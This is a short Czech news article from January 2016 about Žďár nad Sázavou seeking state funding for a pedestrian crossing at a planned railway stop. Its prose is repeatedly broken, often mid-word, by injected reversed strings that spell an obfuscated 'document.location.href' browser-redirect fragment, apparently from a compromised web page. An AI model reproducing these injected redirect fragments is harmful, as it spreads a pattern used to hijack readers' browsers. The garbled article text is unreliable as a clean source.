Rainbow page separator

Ve Žďáře shání peníze na financování přechodu u zastávky

Pátek, 22. ledna 2016

Peníze, papírové bankovky

Žďár nad Sázavou / Kde sehnat peníze na mimoúrovňový přechod, který by byl nutnou součástí nové železniční zastávky v průmyslové zóně, řeší žďárská radnice. Právě na náročném financování přechodu pro pěší projekt v roce 2013 ze strany města uvázl.
„Od té doby se změnilo [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, že místní komunikace v průmyslové zóně se přeložením silnice I/19 změnila na státní silnici,“ informoval starosta Žďáru Zdeněk Navrátil s tím, že za těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to okolností by bylo možné na bezpečný přechod přes státní silnici žádat o státní peníze. „Budeme jednat se Státním fondem dopravní infrastruktury, který by v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to případě teoreticky mohl poskytnout prostředky na zvýšení bezpečnosti přechodu silnice I. třídy,“ upřesnil starosta.
Jednání všech zúčastněných jsou teprve v začátcích. Přesně nebylo stanoveno ani [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, kde zastávka, kterou by nechala vybudovat Správa železniční dopravní cesty (SŽDC), má stát. „Dosud jsme zvažovali dvě až tři varianty. Se SŽDC budeme posuzovat jak ekonomickou náročnost, tak i možnost čerpání dotačních fondů,“ doplnil žďárský mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Josef Klement.